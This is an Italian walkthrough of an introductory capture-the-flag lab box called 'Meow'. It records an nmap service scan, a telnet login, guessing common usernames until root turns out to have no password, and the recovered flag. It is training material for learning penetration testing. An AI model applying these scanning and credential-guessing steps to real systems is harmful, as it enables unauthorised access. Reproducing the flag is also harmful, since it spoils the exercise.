IP 10.129.173.154
----------------------
cerco porte aperte con nmap, specifico -sV per identificare i servizi

sudo nmap -sV 10.129.173.154
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 04:53 EDT
Nmap scan report for 10.129.173.154
Host is up (0.050s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
23/tcp open  telnet  Linux telnetd
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.34 seconds

Vedo il servizio telnet il quale permette di connetersi per il remote manafement
-------------------------------
sfrutto il toll telnet per connetermi telnet 10.129.173.154

Trying 10.129.173.154...
Connected to 10.129.173.154.
Escape character is '^]'.

  █  █         ▐▌     ▄█▄ █          ▄▄▄▄
  █▄▄█ ▀▀█ █▀▀ ▐▌▄▀    █  █▀█ █▀█    █▌▄█ ▄▀▀▄ ▀▄▀
  █  █ █▄█ █▄▄ ▐█▀▄    █  █ █ █▄▄    █▌▄█ ▀▄▄▀ █▀█
  
Meow login: 

vedo che il sistema è protetto da password, faccio un brute force basilare (admin, root) e scopro che l'account root non ha la password
-----------------
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-77-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Fri 01 Jul 2022 08:58:52 AM UTC

  System load:           0.08
  Usage of /:            41.7% of 7.75GB
  Memory usage:          4%
  Swap usage:            0%
  Processes:             136
  Users logged in:       0
  IPv4 address for eth0: 10.129.173.154
  IPv6 address for eth0: dead:beef::250:56ff:fe96:8fdd

 * Super-optimized for small spaces - read how we shrank the memory
   footprint of MicroK8s to make it the smallest full K8s around.

   https://ubuntu.com/blog/microk8s-memory-optimisation

75 updates can be applied immediately.
31 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Mon Sep  6 15:15:23 UTC 2021 from 10.10.14.18 on pts/0
root@Meow:~# 
------------------------------
navigo nella directory e trovo il tag flag
b40abdfe23665f766f9c61ecba8a4c19
